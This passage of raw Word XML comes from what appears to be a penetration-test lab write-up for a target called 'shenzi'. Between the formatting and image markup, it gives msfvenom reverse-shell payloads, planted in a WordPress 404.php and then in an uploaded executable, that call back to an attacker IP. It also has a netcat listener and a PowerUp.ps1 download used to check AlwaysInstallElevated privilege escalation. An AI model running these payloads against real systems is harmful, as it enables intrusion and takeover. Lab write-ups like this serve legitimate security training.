                            <a:ext cx="5613400" cy="2366645"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>After successfully logged in, we'll navigate to Appearance -&gt; Theme Editor -&gt; Theme Twenty Twenty to determine the active website theme. If we select a .php page (such as 404.php) we discover that we can directly edit the page's source code.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http://192.168.232.55/shenzi/wp-admin/theme-editor.php?file=404.php&amp;theme=twentytwenty</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="2257425"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="10" name="Image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 descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="2257425"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>We generated meterpreter payload with MSF and updated 404.php code with it to get a RCE .</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msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.45.154 lport=443 -f raw &gt; shell.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="650240"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="11" name="Image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10" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="650240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="4796155"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12" name="Image1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1" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId13"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="4796155"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="2290445"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="13" name="Image1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12" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="2290445"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="2546985"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="14" name="Image1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3" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="2546985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t xml:space="preserve">After updating 404.php file we will visit </w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:tgtFrame="_top">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                  <w:color w:val="C9211E"/>
                </w:rPr>
                <w:t>http://192.168.232.55/shenzi/wp-content/themes/twentytwenty/404.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="C9211E"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t xml:space="preserve">to execute the reverse shell and catch it using </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
                <w:color w:val="C9211E"/>
              </w:rPr>
              <w:t>multi/handler</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="992505"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="15" name="Image1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14" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="992505"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t>Meanwhile, on our Metasploit console:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="626110"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="16" name="Image1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5" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="626110"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans"/>
              </w:rPr>
              <w:t>Since PHP reverse shells are somewhat unstable, let's upload a more stable shell, which we'll generate with msfvenom and uploading using meterpreter.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msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.154 LPORT=139 -f exe &gt; shell.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="854710"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="17" name="Image1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16" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="854710"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t>On Kali attacking machine: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sudo nc -lvp 139</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t>On Meterpreter session:</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meterpreter &gt; upload shell.exe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meterpreter &gt; execute -f shell.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="959485"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="18" name="Image1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7" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="959485"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="1337945"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="19" name="Image1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8" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="1337945"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="None"/>
                <w:rFonts w:cs="Calibri"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Local.txt value: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whoami &amp;&amp; ipconfig &amp;&amp; type local.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="2304415"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="20" name="Image1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9" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId22"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="2304415"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading3"/>
              <w:tabs>
                <w:tab w:val="clear" w:pos="720"/>
                <w:tab w:val="left" w:pos="0" w:leader="none"/>
              </w:tabs>
              <w:ind w:hanging="0" w:start="0"/>
              <w:rPr/>
            </w:pPr>
            <w:bookmarkStart w:id="59" w:name="__RefHeading___Toc5502_4118114545"/>
            <w:bookmarkEnd w:id="59"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Privilege Escalation - AlwaysInstallElevated</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t xml:space="preserve">We used PowerUp.ps1 to check the low-hanging fruit and found that system is vulnerable to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="C9211E"/>
              </w:rPr>
              <w:t>AlwaysInstallElevated</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="DefaultParagraphFont"/>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t>. As Microsoft mentioned, This option is equivalent to granting full administrative rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:tgtFrame="_top">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                  <w:color w:val="FF0000"/>
                </w:rPr>
                <w:t>https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:hyperlink r:id="rId24" w:tgtFrame="_top">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                  <w:color w:val="FF0000"/>
                </w:rPr>
                <w:t>https://learn.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>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python -m http.server 80</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="440055"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="21" name="Image2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20" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId25"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="440055"/>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iwr http://192.168.45.154/PowerUp.ps1 -o PowerUp.ps1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="1385570"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="22" name="Image2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21" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId26"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="1385570"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
              </w:rPr>
              <w:t>We’ll load the PowerUp.ps1 script into powershell and check for any low-hanging fruit.</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PS C:\Users\shenzi\Desktop&gt; . .\PowerUp.ps1</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PS C:\Users\shenzi\Desktop&gt; Invoke-AllChecks</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="959485"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="23" name="Image2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22" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId27"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="959485"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:widowControl w:val="false"/>
              <w:spacing w:lineRule="auto" w:line="360"/>
              <w:jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5613400" cy="1037590"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="24" name="Image2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23" descr="" title=""/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId28"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5613400" cy="1037590"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
